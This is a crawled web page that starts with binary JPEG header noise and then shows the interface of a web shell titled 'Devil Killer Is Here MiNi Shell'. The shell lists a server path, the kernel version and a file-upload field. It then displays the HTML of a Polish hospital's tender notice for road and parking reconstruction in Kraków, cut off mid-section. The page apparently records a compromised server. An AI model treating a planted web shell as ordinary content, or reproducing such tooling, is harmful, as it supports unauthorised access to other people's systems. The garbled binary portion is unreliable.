JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240209/0010004701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg, ciągów pieszych i parkingów na terenie Zespołu szpitalno-parkowego w Krakowie-Kobierzynie - ZP-4/24 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. dr. J. Babińskiego SPZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000298554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr. Józefa Babińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-393</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@babinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg, ciągów pieszych i parkingów na terenie Zespołu szpitalno-parkowego w Krakowie-Kobierzynie - ZP-4/24 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b8a3113-c72c-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00100047</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00561717/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dróg, ciągów pieszych i miejsc postojowych na terenie Zespołu szpitalno - parkowego w Krakowie Kobierzynie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_babinski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski <br/>2. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. <br/>3. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej. <br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg). b) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z<br/>6. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email. <br/>7. Wykonawca ofertę oraz przedmiotowe środki dowodowe (jeżeli są wymagane w SWZ) składa pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-4/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania jest udzielenie zamówienia w zakresie wykonania robót budowlanych i instalacyjnych w ramach zadania pn.: „Przebudowa i rozbudowa dróg, chodników i parkingów na terenie Zespołu szpitalno-parkowego w Krakowie-Kobierzynie”. <br/>2.	Przedmiot zamówienia stanowi wykonanie robót budowlanych i instalacyjnych w podziale na zakres podstawowy zamówienia (10 odcinków) i zakres opcjonalny zamówienia (9 odcinków, z których każdy stanowi osobą opcję).<br/>3.	Zakres podstawowy zamówienia obejmuje wykonanie robót budowlanych i instalacyjnych w zakresie:<br/>1) Pierwszy etap – Odcinek 5 <br/>2) Drugi etap – Odcinek 6 <br/>3) Trzeci etap – Odcinek 7 <br/>4) Czwarty etap – Odcinek 10 <br/>5) Piąty etap - Odcinek 11 <br/>6) Szósty etap - Odcinek 12 <br/>7) Siódmy etap – Odcinek 16 <br/>8) Ósmy etap – Odcinek 17 – <br/>9) Dziewiąty etap – Odcinek 18 <br/>10) Dziesiąty etap – Odcinek 19 <br/>Zakres podstawowy zamówienia obejmuje wykonanie między innymi: nawierzchni dróg, chodników, parkingów, placów, zjazdów i terenów utwardzonych, opasek wokół budynków, nawierzchni żwirowych oraz wykonanie robót budowlano-instalacyjnych i towarzyszących - w zależności od etapu Przedmiotu zamówienia, wynikających z dokumentacji projektowej stanowiącej dokumentację niniejszego postępowania. <br/>4.	Zakres zamówienia w prawie opcji obejmuje wykonanie robót budowlanych i instalacyjnych w zakresie:<br/>1) Jedenasty etap – Odcinek 1 <br/>2) Dwunasty etap – Odcinek 2 <br/>3) Trzynasty etap – Odcinek 3 <br/>4) Czternasty etap – Odcinek 4 <br/>5) Piętnasty etap – Odcinek 8 <br/>6) Szesnasty etap – Odcinek 9 <br/>7) Siedemnasty etap – Odcinek 13 <br/>8) Osiemnasty etap – Odcinek 15 <br/>9) Dziewiętnasty etap – Odcinek 20 <br/>Zakres zamówienia w prawie opcji obejmuje wykonanie między innymi: nawierzchni dróg, chodników, parkingów, placów, zjazdów i terenów utwardzonych, opasek wokół budynków, nawierzchni żwirowych oraz wykonanie robót budowlano-instalacyjnych i towarzyszących - w zależności od etapu Przedmiotu zamówienia, wynikających z dokumentacji projektowej stanowiącej dokumentację niniejszego postępowania. <br/>5.	W ramach przedmiotu zamówienia (podstawowego i w prawie opcji) Wykonawca wykona, między innymi:<br/>1) Roboty rozbiórkowe i demontażowe, w tym:<br/>a) rozebranie istniejącej nawierzchni dróg i parkingów wraz z podbudową,<br/>b) demontaż istniejącego uzbrojenia w pasie drogowym: sieci wodnej (skrzynki na zasuwach, hydranty podziemne, itp.), sieci kanalizacyjnej (istniejące wpusty uliczne, włazy na kanalizacji deszczowej, itp.) i sieci ciepłowniczej (włazy na kanałach ciepłowniczych),<br/>c) wyłączenie i zabezpieczenie starej sieci kanalizacyjnej w obrębie pasa drogowego,<br/>d) zabezpieczenie istniejących w pasie drogowym instalacji teletechnicznych np. rurami przeznaczonymi do osłony kabli,<br/>e) rozebranie chodników wraz z podbudową, krawężnikami i obrzeżami.<br/>2) Roboty budowlano-instalacyjne, w tym:<br/>a) przebudowę układu drogowego - zespołu istniejących dróg wewnętrznych,<br/>b) przebudowę i rozbudowę ciągów pieszych (chodników) w bezpośrednim rejonie przebudowywanych dróg,<br/>c) przebudowę istniejących miejsc postojowych i budowę nowych parkingów,<br/>d) powierzchniowe utwardzenie terenu,<br/>e) przebudowę i budowę zjazdów indywidualnych oraz opasek wokół budynków,<br/>f) budowę sieci odwodnieniowej zbierającej wody opadowe i roztopowe z dróg i parkingów oraz terenów przyległych do drogi (zewnętrzna instalacja kanalizacji deszczowej) wraz z uzbrojeniem (wpusty uliczne, studzienki, osadniki, itp.),<br/>g) wymianę włazów na studzienkach kanalizacyjnych i kanałach ciepłowniczych oraz wymianę pokryw i skrzynek do zasuw i hydrantów w terenie objętym budową dróg,<br/>h) wykonanie zabezpieczenia kanałów ciepłowniczych przebiegających pod projektowanymi drogami w postaci płyt żelbetowych posadowionych na istniejących ścianach kanałów,<br/>i) wykonanie lokalnego systemu parkingowego składającego z kas parkingowych, szlabanów wraz z terminalami wjazdowymi/wyjazdowymi i monitoringiem (kamery na pasach wjazdowych/wyjazdowych), <br/>j) wykonanie stacji ładowania pojazdów elektrycznych oraz wykonanie instalacji elektrycznych zasilających i teletechnicznych,<br/>k) wykonanie w nowej lokalizacji budynku obsługi parkingu wraz z niezbędną infrastrukturą (instalacje, serwery, stacja operatorska); budynek kontenerowy posadowiony na żelbetowej płycie fundamentowej z wykonaną drewnianą więźbą dachową – dach kryty dachówką ceramiczną,<br/>l) wykonanie kanału dla potrzeb prowadzenia sieci instalacji teletechnicznych w obrębie wskazanego odcinka przebudowy dróg,<br/>ł) przywrócenie terenu objętego przebudową dróg do stanu pierwotnego (wykonanie plantowania terenu, zasiew trawy, itp.),<br/>m) wywóz i utylizacja ziemi i gruzu,<br/>n) wykonanie zabezpieczeń drzew rosnących oraz innych wskazanych terenów zielonych bezpośrednio sąsiadujących z terenem przebudowywanych dróg i parkingów (kraty stalowe osłonowe, obłożenie opornikiem betonowym, itp.).<br/>3) Prace inne, w tym:<br/>a) wykonanie operatu geodezyjnego przed rozpoczęciem robót budowlano-instalacyjnych (aktualizacja morfologii terenu),<br/>b) zapewnienie i zabezpieczenie całodobowego dojścia i dojazdu samochodem do każdego budynku Zamawiającego znajdującego się przy przebudowywanym odcinku drogi, celem obsługi medycznej, żywieniowej i logistycznej,<br/>c) zabezpieczenie ciągłości ruchu drogowego i pieszego na czas robót (organizacja ruchu na czas robót – wykonanie i uzgodnienie projektu tymczasowej organizacji ruchu, wprowadzenie, utrzymanie, likwidacja),<br/>d) utrzymanie nawierzchni jezdni odcinków dróg na terenie kompleksu szpitalno-parkowego i budowy w stanie niepogorszonym i zapewniającym bezpieczny ruch pojazdów od daty przejęcia terenu budowy,<br/>e) wprowadzenie stałej organizacji ruchu (nowe oznakowanie poziome i oznakowanie pionowe, montaż urządzeń bezpieczeństwa ruchu drogowego), <br/>f) przeprowadzenie wymaganych badań i pomiarów,<br/>g) wykonanie dokumentacji powykonawczej, w tym geodezyjnej,<br/>h) wykonanie innych prac wynikających z projektów wykonawczych i projektu stałej / docelowej organizacji ruchu,<br/>4) Wykonanie robót budowlano-instalacyjnych, które nie zostały wyszczególnione w przedmiarze robót, a są konieczne do realizacji przedmiotu Umowy zgodnie z dokumentacją projektową.<br/>6.	Przedmiot zamówienia wykonany zostanie w oparciu o zapisy umowy, zgodnie z dokumentacją projektową pn.: „Przebudowa i rozbudowa dróg wewnętrznych wraz z budową, przebudową i rozbudową miejsc postojowych, parkingów, chodników i utwardzeń terenu, rozbudową i przebudową placów manewrowych, ciągów pieszych, budową szlabanów parkingowych oraz rozbudową instalacji zewnętrznej elektrycznej i kanalizacji deszczowej obsługującej drogi oraz rozbiórka budynku usługowego obsługi parkingu zlokalizowanych na terenie Zespołu Szpitalno-Parkowego w Krakowie-Kobierzynie”, autorstwa Pracowni Projektowej Mariusz Pawelec z siedzibą w Krakowie, będącą załącznikiem do niniejszej Specyfikacji Warunków Zamówienia, decyzję pozwolenia na budowę oraz w oparciu o przedmiary robót i ofertę Wykonawcy w postaci kosztorysów ofertowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> PRAWO OPCJI - Zamawiający zgodnie z art. 441 ustawy Pzp, może skorzystać z prawa opcji w zakresie realizacji prac osobno dla każdego z etapów zamówienia - od etapu Jedenastego do etapu Dziewiętnastego, na następujących zasadach:<br/>1) skorzystanie z prawa opcji nie stanowi zmiany umowy,<br/>2) zlecenie realizacji zamówienia w ramach prawa opcji może, ale nie musi nastąpić w zależności od zapotrzebowania Zamawiającego oraz wysokości środków finansowych przyznanych Zamawiającemu na ten cel (dotacja). <br/>3) Realizacja zamówienia w ramach prawa opcji może być zlecona Wykonawcy:<br/>a) w całości, co oznacza, że Zamawiający może zlecić Wykonawcy realizację wszystkich dziewięciu etapów zamówienia lub<br/>b) w części, co oznacza, że Zamawiający może zlecić Wykonawcy realizację danego poszczególnego etapu zamówienia (jednego lub kilku, od etapu Jedenastego do etapu Dziewiętnastego) w całości lub części, lub<br/>c) wcale,<br/>4) W przypadku skorzystania przez Zamawiającego z prawa opcji, wynagrodzenie przysługuje Wykonawcy z tytułu realizacji zleconego Wykonawcy etapu zamówienia.<br/>5) Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie prawa opcji, jeżeli Zamawiający nie skorzysta z przedmiotowego prawa. Nieskorzystanie przez Zamawiającego z prawa opcji nie wymaga podania przyczyny i nie stanowi podstawy do dochodzenia względem niego odpowiedzialności z tytułu niewykonania umowy.<br/>6) Ewentualne skorzystanie przez Zamawiającego z prawa opcji będzie polegało na przekazaniu przez Zamawiającego względem Wykonawcy oświadczenia w przedmiocie skorzystania z tego prawa ze zleceniem realizacji robót odpowiednio w ramach osobno każdego z etapów zamówienia (od etapu Jedenastego do etapu Dziewiętnastego), na warunkach określonych w umowie. Dla oświadczenia Zamawiającego wskazanego w zdaniu poprzednim Strony przewidują formę pisemną pod rygorem nieważności.<br/>7) W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji na warunkach określonych w umowie, co Wykonawca akceptuje przez podpisanie umowy (załącznik nr 4 do SWZ).<br/>8) Szczegółowe zasady skorzystania przez Zamawiającego z prawa opcji określone zostały we wzorze umowy załączniku nr 4 do SWZ. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek: Sytuacja ekonomiczna lub finansowa - Wykonawca spełni warunek jeżeli wykaże się posiadaniem na rachunku bankowym środków finansowych w wysokości minimum 2 000 000,00 zł (słownie: dwa miliony złotych) lub posiada zdolność kredytową na kwotę minimum 2 000 000,00 zł (słownie: dwa miliony złotych).<br/><br/>Warunek: Zdolność techniczna lub zawodowa - <br/>1. Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej jedną robotę budowlaną obejmującą budowę lub rozbudowę lub odbudowę lub przebudowę lub remont drogi wraz z chodnikami o wartości robót w tym zakresie nie mniejszej niż 5 000 000,00 zł brutto (słownie: pięć milionów złotych brutto).<br/>UWAGA!<br/>Zamawiający informuje, iż w przypadku wykazywania na potrzeby potwierdzania spełniania przez Wykonawcę niniejszego warunku doświadczenia w realizacji zadania wykonanego przez grupę wykonawców (np. konsorcjum), za miarodajne z punktu widzenia wykazania spełniania tego warunku zostanie uznane jedynie doświadczenie polegające na faktycznej realizacji prac wskazanych w treści tego warunku. Nie zostanie uznane za potwierdzenie spełniania tego warunku legitymowanie się nabyciem doświadczenia w realizacji zadania wykonanego przez grupę wykonawców (np. konsorcjum) jedynie poprzez fakt bycia jednym z członków tej grupy (np. członkiem konsorcjum), jeżeli faktycznie nie zrealizowało się w ramach tego zadania prac wskazanych w treści tego warunku, chyba że Wykonawca wykaże, iż nawet pomimo braku faktycznej realizacji w ramach danego zadania wskazanych w warunku prac to jednak zakres i przedmiot czynności, obowiązków i odpowiedzialności faktycznie odnosił się do całości zadania (tj. również do prac faktycznie niewykonywanych), co oznaczałoby nabycie doświadczenia odnośnie całości jego przedmiotu (tj. również do prac faktycznie niewykonywanych).<br/>2. Wykonawca spełni warunek, jeżeli wykaże, że dysponuje jedną osobą na stanowisku Kierownika budowy, która posiada:<br/>- odpowiednie względem przedmiotu zamówienia uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej (lub uprawnienia równoważne),<br/>- doświadczenie polegające na sprawowaniu funkcji Kierownika budowy przy realizacji co najmniej dwóch zakończonych robót budowlanych obejmujących budowę lub rozbudowę lub odbudowę lub przebudowę lub remont dróg wraz z chodnikami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję 